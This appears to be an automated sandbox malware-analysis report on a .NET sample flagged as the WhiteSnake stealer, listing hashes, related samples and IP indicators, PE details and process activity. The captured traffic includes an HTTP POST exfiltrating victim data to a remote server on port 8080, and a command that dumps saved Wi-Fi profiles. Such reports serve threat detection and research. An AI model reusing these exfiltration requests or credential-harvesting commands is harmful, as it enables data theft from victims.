                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:16
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:file.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@26/3@1/2
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 71%
                                                                          • Number of executed functions: 8
                                                                          • Number of non-executed functions: 8
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Stop behavior analysis, all processes terminated
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          • VT rate limit hit for: file.exe
                                                                          TimeTypeDescription
                                                                          18:06:59API Interceptor15x Sleep call for process: file.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          208.95.112.14tuMnSBgXFwIxMP.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          20092837.exeGet hashmaliciousGuLoaderBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          tfz7ikR76n.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          173088012436cb09e4ff67d5495bafb892243773781ebe8236073aca4dd15efcce792bb9ed419.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          aviso de transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          ulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          ip-api.com4tuMnSBgXFwIxMP.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 208.95.112.1
                                                                          20092837.exeGet hashmaliciousGuLoaderBrowse
                                                                          • 208.95.112.1
                                                                          dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 208.95.112.1
                                                                          DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 208.95.112.1
                                                                          tfz7ikR76n.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 208.95.112.1
                                                                          RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 208.95.112.1
                                                                          173088012436cb09e4ff67d5495bafb892243773781ebe8236073aca4dd15efcce792bb9ed419.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 208.95.112.1
                                                                          aviso de transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                          • 208.95.112.1
                                                                          REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 208.95.112.1
                                                                          ulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 208.95.112.1
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          TUT-ASUS4tuMnSBgXFwIxMP.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 208.95.112.1
                                                                          20092837.exeGet hashmaliciousGuLoaderBrowse
                                                                          • 208.95.112.1
                                                                          dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 208.95.112.1
                                                                          DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 208.95.112.1
                                                                          tfz7ikR76n.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 208.95.112.1
                                                                          RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 208.95.112.1
                                                                          173088012436cb09e4ff67d5495bafb892243773781ebe8236073aca4dd15efcce792bb9ed419.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 208.95.112.1
                                                                          aviso de transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                          • 208.95.112.1
                                                                          REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 208.95.112.1
                                                                          ulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 208.95.112.1
                                                                          PL-SKYTECH-ASPLPayload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                          • 95.214.53.96
                                                                          4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dllGet hashmaliciousUnknownBrowse
                                                                          • 193.34.212.14
                                                                          4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dllGet hashmaliciousUnknownBrowse
                                                                          • 193.34.212.14
                                                                          SH20240622902.scr.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                          • 193.34.212.15
                                                                          arm7.elfGet hashmaliciousUnknownBrowse
                                                                          • 95.214.52.167
                                                                          mpslbot.elfGet hashmaliciousUnknownBrowse
                                                                          • 95.214.52.167
                                                                          mipsbot.elfGet hashmaliciousUnknownBrowse
                                                                          • 95.214.52.167
                                                                          file.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                          • 193.34.212.15
                                                                          SecuriteInfo.com.Linux.Siggen.9999.17528.22528.elfGet hashmaliciousMiraiBrowse
                                                                          • 149.86.239.18
                                                                          MAERSK Release 242397734 SBK0000508124_pdf.exeGet hashmaliciousRemcosBrowse
                                                                          • 95.214.54.179
                                                                          No context
                                                                          No context
                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                          File Type:CSV text
                                                                          Category:dropped
                                                                          Size (bytes):1498
                                                                          Entropy (8bit):5.364175471524945
                                                                          Encrypted:false
                                                                          SSDEEP:24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoC1qE4GIs0E4K6sXE4Npv:MxHKQEAHKKkKYHKGSI6oPtHTHK1qHGI8
                                                                          MD5:1B713A2FD810C1C9A8F6F6BE36F406B1
                                                                          SHA1:0828576CB8B83C21F36AD29E327D845AB3574EBB
                                                                          SHA-256:E51E809582894F4D484939BE3990DFC914E43F4AF72AE55A00B01FCFE348763B
                                                                          SHA-512:D32200B7FA9D0DFEF4011D98D40260838A522E63C874FBCCE00D331D663169DBE1C613AD0E81C76F69A8CE6C7265605175CA75BA2C8BDA7748290B34579E148B
                                                                          Malicious:true
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview:1
                                                                          Process:C:\Windows\System32\timeout.exe
                                                                          File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.41440934524794
                                                                          Encrypted:false
                                                                          SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                          MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                          SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                          SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                          SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                          Malicious:false
                                                                          Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):5.305868212280175
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          File name:file.exe
                                                                          File size:139'776 bytes
                                                                          MD5:cd0da55aa7811e92f71088f57df9a493
                                                                          SHA1:a9430383ea4500243858a74d51bc4dcb5eda23c2
                                                                          SHA256:0d503ceee2af7760bc677a71274ed2ba2c0b7d746f48fb816e091a7c92c55862
                                                                          SHA512:bf5d77ef88a13ae5ee18049331c83c78342ddd6a00cc738ffc70f9e05d216e7acbd691cb9358be39fddc658a40f7b813932c0d78f93e37f589df736ba9069ef6
                                                                          SSDEEP:3072:CaWWGbrPnlMV6u9bXuP087qRtNmo6mClbZCW:CTWGHdMgu9bXK0KqNmoCjC
                                                                          TLSH:FAD3D756B2919FA1C19E8DB691B2173003B559028F82FF055DDEF1902DD32D8EA236FB
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............N4... ...@....@.. ....................................`................................
                                                                          Icon Hash:00928e8e8686b000
                                                                          Entrypoint:0x42344e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0xE7D68599 [Fri Apr 3 11:16:41 2093 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x234000x4b.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000x730.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x260000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x214540x21600d2afb0e6fa41b7bbff9b326f82691945False0.4170836259363296data5.321372026568063IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x240000x7300x800c2661203ed4bb47adf374d9e41c86311False0.4375data4.573334441128833IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x260000xc0x2004237e76e199d7ef0db06f4e6e9e6aadeFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_VERSION0x240a00x4a4data0.4797979797979798
                                                                          RT_MANIFEST0x245440x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-11-07T00:07:00.855825+01002050601ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request1192.168.2.54970591.223.3.1648080TCP
                                                                          2024-11-07T00:07:00.914550+01002050602ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration1192.168.2.54970591.223.3.1648080TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 7, 2024 00:06:59.434489012 CET4970480192.168.2.5208.95.112.1
                                                                          Nov 7, 2024 00:06:59.439512014 CET8049704208.95.112.1192.168.2.5
                                                                          Nov 7, 2024 00:06:59.439601898 CET4970480192.168.2.5208.95.112.1
                                                                          Nov 7, 2024 00:06:59.450870991 CET4970480192.168.2.5208.95.112.1
                                                                          Nov 7, 2024 00:06:59.456168890 CET8049704208.95.112.1192.168.2.5
                                                                          Nov 7, 2024 00:07:00.041039944 CET8049704208.95.112.1192.168.2.5
                                                                          Nov 7, 2024 00:07:00.085500956 CET4970480192.168.2.5208.95.112.1
                                                                          Nov 7, 2024 00:07:00.496546984 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.501462936 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.502574921 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.502748966 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.507507086 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.855824947 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.860827923 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.860841990 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.860852003 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.860868931 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.860883951 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.860888004 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.860893965 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.860913038 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.860955000 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.860990047 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.861006975 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.861016035 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.861032009 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.861047983 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.861078024 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.861093044 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.865786076 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.865823030 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.865869045 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.865875959 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.865878105 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.865926027 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.865935087 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.865935087 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.865969896 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.866004944 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.914413929 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.914550066 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:00.965823889 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:00.966051102 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:01.013855934 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.013919115 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:01.061784983 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.061850071 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:01.113130093 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.113331079 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:01.118310928 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118323088 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118371964 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:01.118398905 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118416071 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118426085 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118472099 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118534088 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118542910 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118546963 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118552923 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118669987 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118680000 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118689060 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118697882 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118709087 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118853092 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118886948 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.118925095 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.119177103 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.123553038 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.365212917 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.413645983 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:01.786674976 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.786689997 CET80804970591.223.3.164192.168.2.5
                                                                          Nov 7, 2024 00:07:01.786758900 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:03.771176100 CET497058080192.168.2.591.223.3.164
                                                                          Nov 7, 2024 00:07:03.771632910 CET4970480192.168.2.5208.95.112.1
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 7, 2024 00:06:59.312458038 CET6464153192.168.2.51.1.1.1
                                                                          Nov 7, 2024 00:06:59.319263935 CET53646411.1.1.1192.168.2.5
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Nov 7, 2024 00:06:59.312458038 CET192.168.2.51.1.1.10x34cStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Nov 7, 2024 00:06:59.319263935 CET1.1.1.1192.168.2.50x34cNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                          • ip-api.com
                                                                          • 91.223.3.164:8080
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549704208.95.112.1803144C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 7, 2024 00:06:59.450870991 CET85OUTGET /line?fields=query,country HTTP/1.1
                                                                          Host: ip-api.com
                                                                          Connection: Keep-Alive
                                                                          Nov 7, 2024 00:07:00.041039944 CET199INHTTP/1.1 200 OK
                                                                          Date: Wed, 06 Nov 2024 23:06:59 GMT
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          Content-Length: 29
                                                                          Access-Control-Allow-Origin: *
                                                                          X-Ttl: 60
                                                                          X-Rl: 44
                                                                          Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 0a
                                                                          Data Ascii: United States173.254.250.80


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.54970591.223.3.16480803144C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 7, 2024 00:07:00.502748966 CET250OUTPOST /sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un=YWxmb25z&pc=MTM4NzI3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1
                                                                          Host: 91.223.3.164:8080
                                                                          Content-Length: 148982
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Nov 7, 2024 00:07:01.365212917 CET25INHTTP/1.1 100 Continue
                                                                          Nov 7, 2024 00:07:01.786674976 CET126INHTTP/1.1 200 OK
                                                                          Content-Length: 36
                                                                          Content-Type: application/json
                                                                          Date: Wed, 06 Nov 2024 23:07:01 GMT
                                                                          Server: waitress


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:18:06:56
                                                                          Start date:06/11/2024
                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x2067bea0000
                                                                          File size:139'776 bytes
                                                                          MD5 hash:CD0DA55AA7811E92F71088F57DF9A493
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:18:06:56
                                                                          Start date:06/11/2024
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                          Imagebase:0x7ff6ce510000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:18:06:56
                                                                          Start date:06/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
